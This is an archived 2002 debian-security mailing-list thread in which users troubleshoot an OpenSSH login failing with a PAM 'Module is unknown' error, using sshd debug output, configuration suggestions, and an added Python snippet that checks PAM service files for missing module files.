> debug2: input_userauth_request: try method password
> debug1: PAM Password authentication accepted for user "sukria"
> debug2: pam_acct_mgmt() = 0
> Accepted password for sukria from 127.0.0.1 port 32989 ssh2
> debug1: Entering interactive session for SSH2.
> debug1: fd 3 setting O_NONBLOCK
> debug1: fd 8 setting O_NONBLOCK
> debug1: server_init_dispatch_20
> debug1: server_input_channel_open: ctype session rchan 0 win 65536 max 16384
> debug1: input_session_request
> debug1: channel 0: new [server-session]
> debug1: session_new: init
> debug1: session_new: session 0
> debug1: session_open: channel 0
> debug1: session_open: session 0: link with channel 0
> debug1: server_input_channel_open: confirm session
> debug1: server_input_channel_req: channel 0 request pty-req reply 0
> debug1: session_by_channel: session 0 channel 0
> debug1: session_input_channel_req: session 0 req pty-req
> debug1: Allocating pty.
> debug1: session_pty_req: session 0 alloc /dev/pts/3
> debug3: tty_parse_modes: SSH2 n_bytes 256
> debug3: tty_parse_modes: ospeed 9600
> debug3: tty_parse_modes: ispeed 9600
> debug3: tty_parse_modes: 1 3
> debug3: tty_parse_modes: 2 28
> debug3: tty_parse_modes: 3 127
> debug3: tty_parse_modes: 4 21
> debug3: tty_parse_modes: 5 4
> debug3: tty_parse_modes: 6 0
> debug3: tty_parse_modes: 7 0
> debug3: tty_parse_modes: 8 17
> debug3: tty_parse_modes: 9 19
> debug3: tty_parse_modes: 10 26
> debug3: tty_parse_modes: 12 18
> debug3: tty_parse_modes: 13 23
> debug3: tty_parse_modes: 14 22
> debug3: tty_parse_modes: 18 15
> debug3: tty_parse_modes: 30 0
> debug3: tty_parse_modes: 31 0
> debug3: tty_parse_modes: 32 0
> debug3: tty_parse_modes: 33 0
> debug3: tty_parse_modes: 34 0
> debug3: tty_parse_modes: 35 0
> debug3: tty_parse_modes: 36 1
> debug3: tty_parse_modes: 37 0
> debug3: tty_parse_modes: 38 1
> debug3: tty_parse_modes: 39 0
> debug3: tty_parse_modes: 40 0
> debug3: tty_parse_modes: 41 0
> debug3: tty_parse_modes: 50 1
> debug3: tty_parse_modes: 51 1
> debug3: tty_parse_modes: 52 0
> debug3: tty_parse_modes: 53 1
> debug3: tty_parse_modes: 54 1
> debug3: tty_parse_modes: 55 1
> debug3: tty_parse_modes: 56 0
> debug3: tty_parse_modes: 57 0
> debug3: tty_parse_modes: 58 0
> debug3: tty_parse_modes: 59 1
> debug3: tty_parse_modes: 60 1
> debug3: tty_parse_modes: 61 1
> debug3: tty_parse_modes: 62 0
> debug3: tty_parse_modes: 70 1
> debug3: tty_parse_modes: 71 0
> debug3: tty_parse_modes: 72 1
> debug3: tty_parse_modes: 73 0
> debug3: tty_parse_modes: 74 0
> debug3: tty_parse_modes: 75 0
> debug3: tty_parse_modes: 90 1
> debug3: tty_parse_modes: 91 1
> debug3: tty_parse_modes: 92 0
> debug3: tty_parse_modes: 93 0
> debug1: server_input_channel_req: channel 0 request shell reply 0
> debug1: session_by_channel: session 0 channel 0
> debug1: session_input_channel_req: session 0 req shell
> debug1: PAM setting tty to "/dev/pts/3"
> PAM session setup failed[28]: Module is unknown
> debug1: Calling cleanup 0x805a3ec(0x80917a0)
> debug1: session_pty_cleanup: session 0 release /dev/pts/3
> debug1: Calling cleanup 0x80604b8(0x0)
> debug1: channel_free: channel 0: server-session, nchannels 1
> debug3: channel_free: status: The following connections are open:
>   #0 server-session (t10 r0 i0/0 o0/0 fd -1/-1)
> 
> debug3: channel_close_fds: channel 0: r -1 w -1 e -1
> debug1: Calling cleanup 0x8052b48(0x0)
> debug1: Calling cleanup 0x806be4c(0x0)
> poseidon:~#
> 
> 
> At 07:22 02/10/2002 -0700, Anne Carasik wrote:
> >Kill your sshd. Run it in debugging mode (it will not
> >fork a process):
> >
> ># sshd -ddd
> >
> >Open another window, now run the client in verbose mode:
> >
> >$ ssh -vvv [EMAIL PROTECTED]
> >
> >Then email us the output. :) Otherwise, this is really difficult
> >to troubleshoot.
> >
> >-Anne
> >
> >
> >
> >This one time, Alexis Sukrieh wrote:
> >> You're right, it was set to yes but after putting it to 'no', the same
> >> problem is still there...
> >>
> >> At 16:11 02/10/2002 +0200, you wrote:
> >> >You need to turn off UsePrivilegeSeparation
> >> >in your /etc/ssh/sshd_config file.
> >> >
> >> >"UsePrivilegeSeparation no"
> >>
> >>
> >>
> >>
> >> Alexis Sukrieh (sukria), <[EMAIL PROTECTED]>
> >> . homepage - [http://sukria.net]
> >> . clef PGP - [http://sukria.net/print.php?c=privacy]
> >> . mydynaweb - [http://www.mydynaweb.net]
> >> __
> >>
> >>

Re: Problem with openssh and pam modules

2002-10-02 Thread Anne Carasik
Hi Alexis,

Did you set up /etc/pam.d/ssh?

-Anne

This one time, Alexis Sukrieh wrote:
> Hehe :)
> 
> yes, but before mailing here, I've supposed that there was a missing 
> package dependency in unstable and I looked for pam* stuff.
> 
> I found those ones
> 
> libpam-modules - Pluggable Authentication Modules for PAM
> libpam0g - Pluggable Authentication Modules library
> 
> and I installed it.
> 
> I also installed
> libpam-cracklib - PAM module to enable cracklib support.
> 
> but nothing changed...
> 
> I really don't see what to do ...
> 
> At 07:41 02/10/2002 -0700, you wrote:
> >Hi there,
> >
> >This might provide a clue:
> > debug1: PAM setting tty to "/dev/pts/3"
> > PAM session setup failed[28]: Module is unknown
> >
> >-Anne
> 
> 
> 
> 
> Alexis Sukrieh (sukria), <[EMAIL PROTECTED]>
> . homepage - [http://sukria.net]
> . clef PGP - [http://sukria.net/print.php?c=privacy]
> . mydynaweb - [http://www.mydynaweb.net]
> __
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~
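
The check that question points at, as an added example (not code from the thread or from OpenSSH/PAM): it reads the failing PAM stage out of sshd debug output, then lists the entries of a PAM service file whose module file is not on disk. The sample debug lines, the sample service file, the module name pam_example_missing.so and the module directory /lib/security are constructed assumptions.

```python
import os
import re

# Constructed sshd -ddd excerpt; the last line is the failure quoted in the thread.
SAMPLE_DEBUG = """\
debug1: PAM setting tty to "/dev/pts/3"
PAM session setup failed[28]: Module is unknown
"""

# Constructed /etc/pam.d/ssh; pam_example_missing.so is a made-up module name.
SAMPLE_SERVICE = """\
auth     required  pam_unix.so
account  required  pam_unix.so
session  required  pam_unix.so   # comment after an entry
session  [success=ok default=ignore]  pam_example_missing.so
"""

PAM_FAIL = re.compile(r"PAM (\w+) setup failed\[(\d+)\]: (.+)")

def failing_stage(debug_text):
    """Return (stage, code, message) of the first PAM failure, else None."""
    for line in debug_text.splitlines():
        m = PAM_FAIL.search(line)
        if m:
            return m.group(1), int(m.group(2)), m.group(3).strip()
    return None

def missing_modules(service_text, module_dirs, stage=None):
    """Return (lineno, type, module) for entries whose module file is absent."""
    missing = []
    for lineno, raw in enumerate(service_text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 3 or fields[0].startswith("@"):
            continue  # blank, comment, @include, or malformed line
        mtype = fields[0].lstrip("-")  # a leading "-" marks an optional entry
        idx = 1  # index of the last control field; [..] controls may span several
        if fields[1].startswith("["):
            while idx < len(fields) - 1 and not fields[idx].endswith("]"):
                idx += 1
        if idx + 1 >= len(fields) or (stage and mtype != stage):
            continue
        module = fields[idx + 1]
        dirs = [""] if os.path.isabs(module) else module_dirs
        if not any(os.path.isfile(os.path.join(d, module)) for d in dirs):
            missing.append((lineno, mtype, module))
    return missing

if __name__ == "__main__":  # /lib/security is an assumed, system-specific path
    print(missing_modules(SAMPLE_SERVICE, ["/lib/security"], failing_stage(SAMPLE_DEBUG)[0]))
```

To use it on a real host, pass the contents of the service file and the module directory that host's PAM build uses.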





Re: Problem with openssh and pam modules

2002-10-02 Thread Anne Carasik
This one time, Alexis Sukrieh wrote:
> Well, again it is not the solution for me !
> It is yet turned off

Hmmm.. not sure. 

> is this a common problem ??? I'm surprised in the way that every 
> intelligent solution you all provide to me is ineffective...

Hmmm.. try apt-get remove --purge openssh and reinstall it
after you get PAM working.

> is the ssh package young in the unstable branch ?

I haven't had any problems, but it is unstable after all ;)

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Problem with openssh and pam modules

2002-10-02 Thread Anne Carasik
This one time, Lupe Christoph wrote:
> Correct me if I'm wrong, but don't we expect people who run unstable to
> diagnose problems themselves? If they can't they should be running stable
> or at least testing?

I think there's nothing wrong with helping someone out, no matter
which group they're running. Why should it matter? Isn't this mailing
list called debian-security? Not debian-security-stable.

> Unstable is not just a name...

Neither is testing nor stable :)

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


